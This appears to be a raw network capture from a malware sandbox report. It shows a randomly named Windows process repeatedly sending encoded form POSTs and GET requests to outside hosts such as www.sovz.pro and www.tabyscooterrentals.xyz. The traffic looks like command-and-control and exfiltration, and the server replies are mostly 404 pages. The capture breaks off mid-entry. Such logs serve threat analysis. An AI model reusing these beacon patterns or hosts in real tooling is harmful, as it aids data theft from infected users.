Jan 13, 2025 10:20:55.455426931 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:55 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50024	199.192.21.169	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:57.342422962 CET	464	OUT	GET /rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3J HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:20:57.941283941 CET	933	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:57 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50025	45.130.41.107	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:03.103882074 CET	720	OUT	POST /vwha/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Origin: http://www.sovz.pro Referer: http://www.sovz.pro/vwha/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 32 72 4d 55 78 33 6c 6b 6c 70 4a 43 41 58 56 6c 55 35 78 6e 64 44 48 58 74 43 6c 42 77 6f 64 53 48 7a 70 2f 33 31 6d 31 6c 38 6c 61 62 34 31 30 43 59 37 70 54 48 68 53 6e 44 33 65 72 57 65 73 34 50 41 62 71 56 34 67 42 68 47 49 4d 44 73 2f 6a 55 4c 61 39 4d 4d 52 59 4f 53 74 4b 4c 6d 59 79 39 49 6f 58 77 62 70 78 59 41 2f 66 77 4c 68 30 6c 5a 62 6d 78 61 52 44 69 4f 62 56 76 55 70 41 6f 4f 5a 74 74 76 5a 4c 33 37 64 45 5a 63 32 41 39 72 73 38 41 36 63 74 55 4c 73 30 4a 42 36 37 6a 33 6c 31 46 46 2b 4b 69 61 4e 43 59 44 5a 31 79 52 74 6e 67 3d 3d Data Ascii: idTDev6P=z37FMqdJYYzD2rMUx3lklpJCAXVlU5xndDHXtClBwodSHzp/31m1l8lab410CY7pTHhSnD3erWes4PAbqV4gBhGIMDs/jULa9MMRYOStKLmYy9IoXwbpxYA/fwLh0lZbmxaRDiObVvUpAoOZttvZL37dEZc2A9rs8A6ctULs0JB67j3l1FF+KiaNCYDZ1yRtng==
Jan 13, 2025 10:21:03.830943108 CET	475	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 13 Jan 2025 09:21:03 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50026	45.130.41.107	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:05.655002117 CET	740	OUT	POST /vwha/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Origin: http://www.sovz.pro Referer: http://www.sovz.pro/vwha/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 73 49 45 55 79 51 4a 6b 30 5a 4a 44 63 6e 56 6c 66 5a 77 50 64 44 44 58 74 44 52 52 77 36 35 53 48 57 74 2f 35 55 6d 31 6b 38 6c 61 4f 49 31 78 47 59 36 6c 54 48 73 6e 6e 41 76 65 72 57 4b 73 34 50 51 62 71 6b 34 76 41 78 48 75 56 54 73 48 74 30 4c 61 39 4d 4d 52 59 4f 47 44 4b 50 4b 59 79 4e 34 6f 58 52 62 32 79 59 41 34 56 51 4c 68 6a 56 5a 41 6d 78 61 6a 44 6d 4f 68 56 74 73 70 41 71 47 5a 73 34 44 61 42 33 37 68 62 70 64 49 49 65 76 67 30 6c 4c 4a 69 56 2f 57 37 4a 52 5a 33 46 36 2f 6b 30 6b 70 59 69 2b 2b 66 66 4b 74 34 78 73 6b 38 70 58 32 47 38 68 78 76 43 61 6a 71 70 55 2b 5a 68 78 70 59 70 34 3d Data Ascii: idTDev6P=z37FMqdJYYzDsIEUyQJk0ZJDcnVlfZwPdDDXtDRRw65SHWt/5Um1k8laOI1xGY6lTHsnnAverWKs4PQbqk4vAxHuVTsHt0La9MMRYOGDKPKYyN4oXRb2yYA4VQLhjVZAmxajDmOhVtspAqGZs4DaB37hbpdIIevg0lLJiV/W7JRZ3F6/k0kpYi++ffKt4xsk8pX2G8hxvCajqpU+ZhxpYp4=
Jan 13, 2025 10:21:06.369592905 CET	475	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 13 Jan 2025 09:21:06 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50027	45.130.41.107	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:08.208034039 CET	10822	OUT	POST /vwha/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Origin: http://www.sovz.pro Referer: http://www.sovz.pro/vwha/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 73 49 45 55 79 51 4a 6b 30 5a 4a 44 63 6e 56 6c 66 5a 77 50 64 44 44 58 74 44 52 52 77 36 78 53 48 41 52 2f 35 33 2b 31 69 4d 6c 61 50 49 31 77 47 59 37 2f 54 48 30 72 6e 41 6a 6f 72 55 79 73 34 74 6f 62 73 57 51 76 4b 78 48 75 49 44 73 38 6a 55 4b 41 39 4d 64 61 59 4f 57 44 4b 50 4b 59 79 4c 30 6f 44 51 62 32 2f 34 41 2f 66 77 4c 74 30 6c 59 76 6d 78 44 57 44 6d 43 4c 56 63 4d 70 41 4b 32 5a 76 4f 33 61 4a 33 37 6e 61 70 64 41 49 5a 6d 2b 30 6b 6a 2f 69 56 4c 38 37 4c 4e 5a 33 41 53 6a 32 58 6b 50 43 52 6a 6e 47 2b 2b 30 78 78 77 7a 38 37 54 5a 50 64 35 2b 31 68 2b 76 6d 4b 6c 47 49 51 70 4f 4c 38 50 6d 31 67 44 50 6b 32 6e 44 45 61 53 63 46 71 79 6c 45 6d 56 6b 4c 73 6e 2f 63 4c 34 72 70 55 35 44 55 56 4f 72 49 72 4e 49 2f 65 58 58 67 35 74 4d 43 50 45 2f 48 63 44 42 57 43 57 50 71 56 73 4e 52 52 2f 35 59 6c 65 61 4c 64 58 36 50 36 52 58 51 62 7a 43 44 30 4e 7a 2f 62 7a 41 66 35 30 45 75 4a 46 2b 70 36 6d 69 4a 4c 38 4b 49 73 69 71 61 [TRUNCATED] Data Ascii: idTDev6P=z37FMqdJYYzDsIEUyQJk0ZJDcnVlfZwPdDDXtDRRw6xSHAR/53+1iMlaPI1wGY7/TH0rnAjorUys4tobsWQvKxHuIDs8jUKA9MdaYOWDKPKYyL0oDQb2/4A/fwLt0lYvmxDWDmCLVcMpAK2ZvO3aJ37napdAIZm+0kj/iVL87LNZ3ASj2XkPCRjnG++0xxwz87TZPd5+1h+vmKlGIQpOL8Pm1gDPk2nDEaScFqylEmVkLsn/cL4rpU5DUVOrIrNI/eXXg5tMCPE/HcDBWCWPqVsNRR/5YleaLdX6P6RXQbzCD0Nz/bzAf50EuJF+p6miJL8KIsiqaiqWyChdeG5Yh+smHhhgV1FefupeM2KTQ02+5eZ6/JMuoDgGsEcsp0W7dRXrqn4LM5SmQbVXmDvXt/qTJIhIf/bN8Y457RM+z2VR5M2R77Yg0T0BGgzIuwUdIRi/uA3+8DMje5vsJHf/rrwHMeivRp1sG+OEjqW1c4qen+WWBHFpSwVGvqYJ01rJG3CiRAkRlKgjSBJUha7Xyjjfm9G027GNv+e7fg4Osgn3w1CbBzJdQGmcP3sRDao+3Q32vjaSI+477Gm5fpT23YkmM+Zxa2OGACtbAo3U2xdmDNUxSbVx8lyG1gDm5ip/WvA0FNRN+3Hf9LbyUNz2v+0XotNlym3fVYVhhUYYQd8PKdLT5ZV9gpyFhXrN2co882jYbX0akjOWPN0BJ8+B4kgWdJZI+lUK/3X4pGbcLKK/VieSdL6sd6hkGtedftDS+BA7T7/x2eCEbysYkbdh8wIw2kLXeIAKOf5n49eV3xBpe59+y7kOIRkIhnzKHfUTxddDsIyT/36TD8/XaLYhxeN5d3VId+aGMt7f7WsMdgJ+rCctA9uioqoZOCgOG/loiH5OiddRBWS+628ehYPQaxpaYPJUJ7gC7y6FLro7sS7NpXYfSkH18ef5v8penDfYGS8QROZBxj4N45y0pS/iWhc7ikbzbLaiM80ZOxRj2F0 [TRUNCATED]
Jan 13, 2025 10:21:08.911401033 CET	475	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 13 Jan 2025 09:21:08 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50028	45.130.41.107	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:10.758465052 CET	462	OUT	GET /vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:21:11.475172043 CET	475	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 13 Jan 2025 09:21:11 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 272 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 76 7a 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.sovz.pro Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50029	85.159.66.93	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:16.850492001 CET	762	OUT	POST /l5cx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Origin: http://www.tabyscooterrentals.xyz Referer: http://www.tabyscooterrentals.xyz/l5cx/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 35 78 34 49 7a 42 5a 67 77 54 64 51 7a 37 6a 47 6b 59 54 6e 39 69 53 38 37 6a 41 2f 6a 44 49 59 39 4c 69 49 30 61 35 7a 66 75 6d 75 58 43 52 58 57 61 72 35 72 4b 54 4b 71 71 76 41 72 56 6d 58 38 31 2f 51 4f 6e 67 38 61 61 73 4f 67 7a 4b 6c 6d 50 73 50 71 77 4c 31 55 4a 61 4b 42 69 67 2f 47 70 36 2f 36 54 4e 63 36 6b 63 61 59 31 39 4b 32 31 41 41 6b 56 52 37 4f 4a 35 57 62 74 67 4c 2b 49 78 41 48 70 6f 75 49 76 76 72 49 63 64 78 50 72 41 34 64 4c 33 38 70 38 65 65 45 6e 46 58 44 33 62 71 4e 54 69 68 68 42 49 44 6a 38 37 52 56 52 65 58 73 67 3d 3d Data Ascii: idTDev6P=/ShqnqpQTwoV5x4IzBZgwTdQz7jGkYTn9iS87jA/jDIY9LiI0a5zfumuXCRXWar5rKTKqqvArVmX81/QOng8aasOgzKlmPsPqwL1UJaKBig/Gp6/6TNc6kcaY19K21AAkVR7OJ5WbtgL+IxAHpouIvvrIcdxPrA4dL38p8eeEnFXD3bqNTihhBIDj87RVReXsg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50030	85.159.66.93	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:19.394483089 CET	782	OUT	POST /l5cx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Origin: http://www.tabyscooterrentals.xyz Referer: http://www.tabyscooterrentals.xyz/l5cx/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 2f 68 49 49 77 6d 46 67 32 7a 64 54 38 62 6a 47 39 6f 53 75 39 69 75 38 37 6e 34 56 6a 58 6b 59 39 70 36 49 79 76 46 7a 53 4f 6d 75 44 53 51 66 59 36 72 79 72 4b 66 64 71 76 76 41 72 56 43 58 38 78 37 51 4f 55 49 7a 61 4b 73 4d 6f 54 4b 6a 37 66 73 50 71 77 4c 31 55 4a 65 67 42 6d 4d 2f 46 59 4b 2f 37 79 4e 64 77 45 63 5a 50 46 39 4b 68 46 42 4a 6b 56 52 5a 4f 4e 78 34 62 75 59 4c 2b 4e 56 41 48 34 6f 70 44 76 76 74 46 38 63 76 65 5a 39 44 53 70 47 31 68 38 32 6c 4d 48 51 30 47 78 57 77 63 69 44 32 7a 42 73 77 2b 37 79 6c 59 53 6a 65 33 6c 37 55 45 72 74 6a 30 4f 6e 4b 51 6c 63 65 31 42 52 50 58 73 41 3d Data Ascii: idTDev6P=/ShqnqpQTwoV/hIIwmFg2zdT8bjG9oSu9iu87n4VjXkY9p6IyvFzSOmuDSQfY6ryrKfdqvvArVCX8x7QOUIzaKsMoTKj7fsPqwL1UJegBmM/FYK/7yNdwEcZPF9KhFBJkVRZONx4buYL+NVAH4opDvvtF8cveZ9DSpG1h82lMHQ0GxWwciD2zBsw+7ylYSje3l7UErtj0OnKQlce1BRPXsA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50031	85.159.66.93	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:21.941726923 CET	10864	OUT	POST /l5cx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Origin: http://www.tabyscooterrentals.xyz Referer: http://www.tabyscooterrentals.xyz/l5cx/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 2f 68 49 49 77 6d 46 67 32 7a 64 54 38 62 6a 47 39 6f 53 75 39 69 75 38 37 6e 34 56 6a 57 77 59 39 36 79 49 78 49 52 7a 54 4f 6d 75 66 69 51 63 59 36 72 72 72 4b 48 52 71 76 72 51 72 58 71 58 7a 79 6a 51 49 68 38 7a 51 4b 73 4d 6b 7a 4b 69 6d 50 73 57 71 78 6d 2b 55 4a 75 67 42 6d 4d 2f 46 62 53 2f 79 44 4e 64 2f 6b 63 61 59 31 39 57 32 31 42 6c 6b 56 4a 7a 4f 4e 31 47 61 65 34 4c 35 74 46 41 46 4b 41 70 42 50 76 76 4c 63 63 6e 65 5a 78 63 53 70 4b 54 68 38 79 50 4d 46 4d 30 48 47 72 6d 4c 52 66 7a 69 42 30 52 68 38 75 7a 66 41 32 61 35 79 2f 2b 50 49 41 33 67 61 72 4b 61 79 78 48 6c 41 52 6e 46 71 71 33 75 6b 77 61 54 78 78 6b 35 57 41 77 62 2b 34 68 36 79 67 46 55 51 33 34 47 77 6f 44 2b 64 30 58 6f 56 6c 42 6a 4b 48 67 75 55 2f 74 38 42 57 57 64 47 41 33 75 77 73 42 36 32 46 43 52 77 6e 64 4b 30 71 30 31 7a 35 54 39 56 47 59 62 4a 2f 46 7a 55 4e 6f 72 75 4c 48 77 38 74 4a 5a 50 68 45 78 65 58 42 2f 66 37 6f 7a 6e 35 53 2b 67 46 7a 6a [TRUNCATED] Data Ascii: 